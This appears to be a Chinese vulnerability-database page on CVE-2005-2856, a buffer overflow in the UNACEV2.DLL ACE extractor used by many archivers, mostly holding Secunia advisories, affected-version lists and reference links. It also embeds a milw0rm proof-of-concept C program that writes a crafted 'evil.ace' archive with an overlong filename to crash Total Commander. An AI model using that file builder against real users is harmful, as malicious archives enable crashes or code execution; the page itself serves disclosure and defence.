CVE-2005-2856
CVSS7.5
发布时间 :2005-09-08 06:03:00
修订时间 :2016-10-17 23:30:52
NMCOEPS    

[原文]Stack-based buffer overflow in the WinACE UNACEV2.DLL third-party compression utility before 2.6.0.0, as used in multiple products including (1) ALZip 5.51 through 6.11, (2) Servant Salamander 2.0 and 2.5 Beta 1, (3) WinHKI 1.66 and 1.67, (4) ExtractNow 3.x, (5) Total Commander 6.53, (6) Anti-Trojan 5.5.421, (7) PowerArchiver before 9.61, (8) UltimateZip 2.7,1, 3.0.3, and 3.1b, (9) Where Is It (WhereIsIt) 3.73.501, (10) FilZip 3.04, (11) IZArc 3.5 beta3, (12) Eazel 1.0, (13) Rising Antivirus 18.27.21 and earlier, (14) AutoMate 6.1.0.0, (15) BitZipper 4.1 SR-1, (16) ZipTV, and other products, allows user-assisted attackers to execute arbitrary code via a long filename in an ACE archive.


[CNNVD]Microchip Data Systems ZipTV TZipTV ARJ文件处理溢出漏洞(CNNVD-200509-086)

        ZipTV是一套压缩/解压工具组件的集合。
        ZipTV的TZipTV组件在列出ARJ文档中的文件时存在堆溢出漏洞,如果用户受骗解压了包含有超长ARJ头部块的特制ARJ文档的话,就会触发这个漏洞,导致执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2856
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2856
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-086
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112621008228458&w=2
(UNKNOWN)  BUGTRAQ  20050908 Secunia Research: ALZip ACE Archive Handling Buffer Overflow
http://securityreason.com/securityalert/49
(UNKNOWN)  SREASON  49
http://securitytracker.com/id?1014863
(UNKNOWN)  SECTRACK  1014863
http://securitytracker.com/id?1015852
(UNKNOWN)  SECTRACK  1015852
http://securitytracker.com/id?1016011
(UNKNOWN)  SECTRACK  1016011
http://securitytracker.com/id?1016012
(UNKNOWN)  SECTRACK  1016012
http://securitytracker.com/id?1016065
(UNKNOWN)  SECTRACK  1016065
http://securitytracker.com/id?1016066
(UNKNOWN)  SECTRACK  1016066
http://securitytracker.com/id?1016088
(UNKNOWN)  SECTRACK  1016088
http://securitytracker.com/id?1016114
(UNKNOWN)  SECTRACK  1016114
http://securitytracker.com/id?1016115
(UNKNOWN)  SECTRACK  1016115
http://securitytracker.com/id?1016177
(UNKNOWN)  SECTRACK  1016177
http://securitytracker.com/id?1016257
(UNKNOWN)  SECTRACK  1016257
http://securitytracker.com/id?1016512
(UNKNOWN)  SECTRACK  1016512
http://www.securityfocus.com/archive/1/archive/1/432357/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060428 Secunia Research: Servant Salamander unacev2.dll Buffer OverflowVulnerability
http://www.securityfocus.com/archive/1/archive/1/432579/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060501 Secunia Research: WinHKI unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/433258/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060508 Secunia Research: Anti-Trojan unacev2.dll Buffer OverflowVulnerability
http://www.securityfocus.com/archive/1/archive/1/433352/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060509 Secunia Research: Where Is It unacev2.dll Buffer OverflowVulnerability
http://www.securityfocus.com/archive/1/archive/1/433693/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060511 Secunia Research: UltimateZip unacev2.dll Buffer OverflowVulnerability
http://www.securityfocus.com/archive/1/archive/1/434011/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060515 Secunia Research: FilZip unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/434234/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060517 Secunia Research: IZArc unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/434279/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060517 Secunia Research: Eazel unacev2.dll Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/436639/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060609 Secunia Research: AutoMate unacev2.dll Buffer OverflowVulnerability
http://www.securityfocus.com/archive/1/archive/1/440303/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060717 Secunia Research: BitZipper unacev2.dll Buffer OverflowVulnerability
http://www.securityfocus.com/bid/14759
(UNKNOWN)  BID  14759
http://www.securityfocus.com/bid/19884
(UNKNOWN)  BID  19884
http://www.vupen.com/english/advisories/2006/1565
(UNKNOWN)  VUPEN  ADV-2006-1565
http://www.vupen.com/english/advisories/2006/1577
(UNKNOWN)  VUPEN  ADV-2006-1577
http://www.vupen.com/english/advisories/2006/1611
(UNKNOWN)  VUPEN  ADV-2006-1611
http://www.vupen.com/english/advisories/2006/1681
(UNKNOWN)  VUPEN  ADV-2006-1681
http://www.vupen.com/english/advisories/2006/1694
(UNKNOWN)  VUPEN  ADV-2006-1694
http://www.vupen.com/english/advisories/2006/1725
(UNKNOWN)  VUPEN  ADV-2006-1725
http://www.vupen.com/english/advisories/2006/1775
(UNKNOWN)  VUPEN  ADV-2006-1775
http://www.vupen.com/english/advisories/2006/1797
(UNKNOWN)  VUPEN  ADV-2006-1797
http://www.vupen.com/english/advisories/2006/1835
(UNKNOWN)  VUPEN  ADV-2006-1835
http://www.vupen.com/english/advisories/2006/1836
(UNKNOWN)  VUPEN  ADV-2006-1836
http://www.vupen.com/english/advisories/2006/2047
(UNKNOWN)  VUPEN  ADV-2006-2047
http://www.vupen.com/english/advisories/2006/2184
(UNKNOWN)  VUPEN  ADV-2006-2184
http://www.vupen.com/english/advisories/2006/2824
(UNKNOWN)  VUPEN  ADV-2006-2824
http://www.vupen.com/english/advisories/2006/3495
(UNKNOWN)  VUPEN  ADV-2006-3495
http://xforce.iss.net/xforce/xfdb/26116
(UNKNOWN)  XF  servant-salamander-unacev2-bo(26116)
http://xforce.iss.net/xforce/xfdb/26142
(UNKNOWN)  XF  winhki-unacev2-bo(26142)
http://xforce.iss.net/xforce/xfdb/26168
(UNKNOWN)  XF  extractnow-unacev2-ace-bo(26168)
http://xforce.iss.net/xforce/xfdb/26272
(UNKNOWN)  XF  powerarchiver-unacev2-ace-bo(26272)
http://xforce.iss.net/xforce/xfdb/26302
(UNKNOWN)  XF  antitrojan-unacev2-bo(26302)
http://xforce.iss.net/xforce/xfdb/26315
(UNKNOWN)  XF  whereisit-unacev2-bo(26315)
http://xforce.iss.net/xforce/xfdb/26385
(UNKNOWN)  XF  ultimatezip-unacev2-bo(26385)
http://xforce.iss.net/xforce/xfdb/26447
(UNKNOWN)  XF  filzip-unacev2-bo(26447)
http://xforce.iss.net/xforce/xfdb/26479
(UNKNOWN)  XF  eazel-ztvunacev2-bo(26479)
http://xforce.iss.net/xforce/xfdb/26480
(UNKNOWN)  XF  izarc-unacev2-bo(26480)
http://xforce.iss.net/xforce/xfdb/26736
(UNKNOWN)  XF  risingantivirus-unacev2-bo(26736)
http://xforce.iss.net/xforce/xfdb/26982
(UNKNOWN)  XF  automate-unacev2-bo(26982)
http://xforce.iss.net/xforce/xfdb/27763
(UNKNOWN)  XF  bitzipper-unacev2-bo(27763)
http://xforce.iss.net/xforce/xfdb/28787
(UNKNOWN)  XF  tziptv-unacev2-bo(28787)

- 漏洞信息

Microchip Data Systems ZipTV TZipTV ARJ文件处理溢出漏洞
高危 缓冲区溢出
2005-09-08 00:00:00 2006-09-27 00:00:00
远程  
        ZipTV是一套压缩/解压工具组件的集合。
        ZipTV的TZipTV组件在列出ARJ文档中的文件时存在堆溢出漏洞,如果用户受骗解压了包含有超长ARJ头部块的特制ARJ文档的话,就会触发这个漏洞,导致执行任意代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.ziptv.com/

- 漏洞信息 (1633)

Total Commander 6.x (unacev2.dll) Buffer Overflow PoC Exploit (EDBID:1633)
windows dos
2006-04-02 Verified
0 darkeagle
N/A [点击下载]
/*
--
/\
\/	Total Commander unacev2.dll Buffer Overflow PoC Exploit
/\			by Darkeagle of Unl0ck Research Team
\/					http://unl0ck.net
/\	
\/	when file will be created, try to open archive in TotalCmd and then unpack it ;)
/\
\/
--
*/
#include <string.h>
#include <stdio.h>

unsigned char evil_ace[] = 
	"\x29\x8F\x31\x00\x00\x00\x90\x2A\x2A\x41\x43\x45\x2A\x2A\x14\x14" 
	"\x02\x00\x79\xB5\x7F\x34\xFE\xE2\x05\xA5\x00\x00\x00\x00\x16\x2A" 
	"\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52" 
	"\x53\x49\x4F\x4E\x2A\x7F\x30\x1E\x01\x01\x01\x00\x00\x00\x00\x00" 
	"\x00\x00\x00\x00\x75\xB5\x7F\x34\x20\x00\x00\x00\xFF\xFF\xFF\xFF" 
	"\x00\x03\x0A\x00\x54\x45\xFF\x00\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x2E\x74\x78\x74";


int main()
{
	FILE *ace;
	ace = fopen("evil.ace", "w+b");
	fwrite(evil_ace, 1, sizeof(evil_ace)-1, ace);
	fclose(ace);
	return 0;

}

// milw0rm.com [2006-04-02]
		

- 漏洞信息 (F48377)

secunia-BitZipper.txt (PacketStormID:F48377)
2006-07-20 00:00:00
 
advisory,overflow
CVE-2005-2856
[点击下载]

Secunia Research has discovered a vulnerability in BitZipper, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive. BitZipper version 4.1 SR-1 is affected.

====================================================================== 

                    Secunia Research 17/07/2006

       - BitZipper unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* BitZipper version 4.1 SR-1.

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in BitZipper, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

====================================================================== 
4) Solution 

Do not extract untrusted archives.

====================================================================== 
5) Time Table 

02/05/2006 - Initial vendor notification.
16/05/2006 - Second vendor notification.
16/05/2006 - Initial vendor reply.
17/07/2006 - Public disclosure

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-46/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- 漏洞信息 (F47250)

secunia-AutoMate.txt (PacketStormID:F47250)
2006-06-12 00:00:00
 
advisory,overflow
CVE-2005-2856
[点击下载]

Secunia Research has discovered a vulnerability in AutoMate version 6.1.0.0, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive.

====================================================================== 

                    Secunia Research 07/06/2006

       - AutoMate unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* AutoMate version 6.1.0.0

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Less Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in AutoMate, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

Successful exploitation requires that the user is e.g. tricked into
scheduling a task to extract a malicious ACE archive.

====================================================================== 
4) Solution 

The vendor reportedly released a fix on 2006-05-29.

Do not extract untrusted ACE archives.

====================================================================== 
5) Time Table 

02/05/2006 - Initial vendor notification.
09/05/2006 - Initial vendor reply.
16/05/2006 - Vendor reminder.
16/05/2006 - Vendor reply.
30/05/2006 - Vendor reminder.
07/06/2006 - Public disclosure. (No reply from vendor)

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-38/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- 漏洞信息 (F46478)

secunia-IZArc.txt (PacketStormID:F46478)
2006-05-22 00:00:00
 
advisory,overflow
CVE-2005-2856
[点击下载]

Secunia Research has discovered a vulnerability in IZArc versions 3.5 beta 3, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive.

====================================================================== 

                    Secunia Research 17/05/2006

         - IZArc unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* IZArc version 3.5 beta 3.

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in IZArc, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

====================================================================== 
4) Solution 

Do not extract untrusted ACE archives.

====================================================================== 
5) Time Table 

04/05/2006 - Initial vendor notification.
16/05/2006 - Second vendor notification.
17/05/2006 - Public disclosure. (No reply from vendor)

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-32/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- 漏洞信息 (F46477)

secunia-Eazel.txt (PacketStormID:F46477)
2006-05-22 00:00:00
 
advisory,overflow
CVE-2005-2856
[点击下载]

Secunia Research has discovered a vulnerability in Eazel version 1.0, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in ztvunacev2.dll (UNACEV2.DLL) when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive.

====================================================================== 

                    Secunia Research 17/05/2006

         - Eazel unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* Eazel version 1.0.

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Eazel, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in ztvunacev2.dll
(UNACEV2.DLL) when extracting an ACE archive containing a file with an
overly long filename. This can be exploited to cause a stack-based
buffer overflow when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

====================================================================== 
4) Solution 

Do not extract untrusted ACE archives.

====================================================================== 
5) Time Table 

03/05/2006 - Initial vendor notification.
16/05/2006 - Second vendor notification.
17/05/2006 - Public disclosure. (No reply from vendor)

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-33/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- 漏洞信息 (F46449)

secunia-FilZip.txt (PacketStormID:F46449)
2006-05-22 00:00:00
 
advisory,overflow
CVE-2005-2856
[点击下载]

Secunia Research has discovered a vulnerability in FilZip, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive. Version 3.04 is affected. Earlier versions may also be affected.

====================================================================== 

                    Secunia Research 15/05/2006

       - FilZip unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* FilZip version 3.04.

Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in FilZip, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

====================================================================== 
4) Solution 

Do not extract ACE archives from untrusted sources.

====================================================================== 
5) Time Table 

26/04/2006 - Initial vendor notification.
27/04/2006 - Second vendor notification.
11/05/2006 - Third vendor notification.
15/05/2006 - Public disclosure. (No reply from vendor)

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-30/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- 漏洞信息 (F46227)

secunia-anti.txt (PacketStormID:F46227)
2006-05-09 00:00:00
 
advisory,overflow,trojan
CVE-2005-2856
[点击下载]

Secunia Research has discovered a vulnerability in Anti-Trojan version 5.5.421, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user scans a specially crafted ACE archive.

====================================================================== 

                    Secunia Research 08/05/2006

      - Anti-Trojan unacev2.dll Buffer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* Anti-Trojan 5.5.421. 

Prior versions may also be affected.

====================================================================== 
2) Severity 

Rating: Highly Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Anti-Trojan,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user scans a specially crafted ACE archive.

The vulnerability is related to:
SA16479

Successful exploitation requires that the "Search in archive files"
option is enabled.

====================================================================== 
4) Solution 

Version 5.5 is no longer supported and no fix is available. 

The vendor recommends existing users to upgrade to the successor
product "a-squared Anti-Malware".

====================================================================== 
5) Time Table 

08/05/2006 - Initial vendor notification.
08/05/2006 - Initial vendor reply.
08/05/2006 - Public disclosure.

====================================================================== 
6) Credits 

Discovered by Secunia Research.

====================================================================== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-27/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



    

- 漏洞信息

19224
WinACE UNACEV2.DLL ACE Archive Filename Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in the WinACE UNACEV2 library. The UNACE library used in multiple products fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted ACE archive containing a compressed file with an overly long filename, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-09-07 2005-08-22
Unknow Unknow

- 解决方案

Consult your individual vendor for solution information.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor UNACEV2 Archive File Name Buffer Overflow Vulnerability
Boundary Condition Error 14759
Yes No
2005-09-07 12:00:00 2006-09-07 09:53:00
Discovery is credited to Tan Chew Keong.

- 受影响的程序版本

WinHKI WinHKI 1.67
WinHKI WinHKI 1.66
Where Is It Soft Where Is It 3.73.501
UltimateZip UltimateZip 3.0.3
UltimateZip UltimateZip 2.7.1
UltimateZip UltimateZip 3.1b
Rising Antivirus International Rising Antivirus 2006 18.27.21
Rising Antivirus International Rising Antivirus 2006 18.25.40
Rising Antivirus International Rising Antivirus 2006 18.25.30
Rising Antivirus International Rising Antivirus 2006 18.24.10
Network Automation AutoMate 6.1 .0
Nathan Moinvaziri ExtractNow 3.60
Microchip Data Systems ZipTV for Delphi 7 2006.1.26
Microchip Data Systems ZipTV for C++ Builder 2006.1.16
Ivan Zahariev IZArc 3.5 beta 3
FilZip FilZip 3.04
Eazel Eazel 1.0
ConeXware PowerArchiver 9.60
Bitberry Software BitZipper 4.1 SR-1
ALTools ALZip 6.11 (Korean)
ALTools ALZip 6.1 beta
ALTools ALZip 6.0 3 (English)
ALTools ALZip 5.52
ALTools ALZip 5.51
a-squared Anti-Trojan 5.5.421
WinHKI WinHKI 1.68
Where Is It Soft Where Is It 3.73.505
Rising Antivirus International Rising Antivirus 2006 18.29.12
Nathan Moinvaziri ExtractNow 4.16
ConeXware PowerArchiver 9.61
ALTools ALZip 6.12 (Korean)
ALTools ALZip 6.1

- 不受影响的程序版本

WinHKI WinHKI 1.68
Where Is It Soft Where Is It 3.73.505
Rising Antivirus International Rising Antivirus 2006 18.29.12
Nathan Moinvaziri ExtractNow 4.16
ConeXware PowerArchiver 9.61
ALTools ALZip 6.12 (Korean)
ALTools ALZip 6.1

- 漏洞讨论

Multiple products are prone to a buffer overflow when handling ACE archives that contain files with overly long names.

This may be exploited to execute arbitrary code in the context of the user who is running the application. The vulnerability is considered remotely exploitable in nature because malicious ACE archives will likely originate from an external, untrusted source.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com

- 解决方案

This issue has been addressed in ALZip 6.1 for English and international versions other than Korean. ALZip 6.12 (Korean) addresses the Korean-language release.

This issue has been addressed in WinHKI version 1.68.

This issue is not present in the 4.x series of ExtractNow.

NOTE: a-squared Anti-Trojan is no longer supported. Users of affected Anti-Trojan products are encouraged to upgrade to its successor software, Anti-Malware.

ConeXware PowerArchiver version 9.61 (and later) contains a fix for this issue.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please email us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com.


WinHKI WinHKI 1.66

Nathan Moinvaziri ExtractNow 3.60

WinHKI WinHKI 1.67

Where Is It Soft Where Is It 3.73.501

ALTools ALZip 5.51

ALTools ALZip 5.52

ALTools ALZip 6.0 3 (English)

ALTools ALZip 6.1 beta

ALTools ALZip 6.11 (Korean)

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站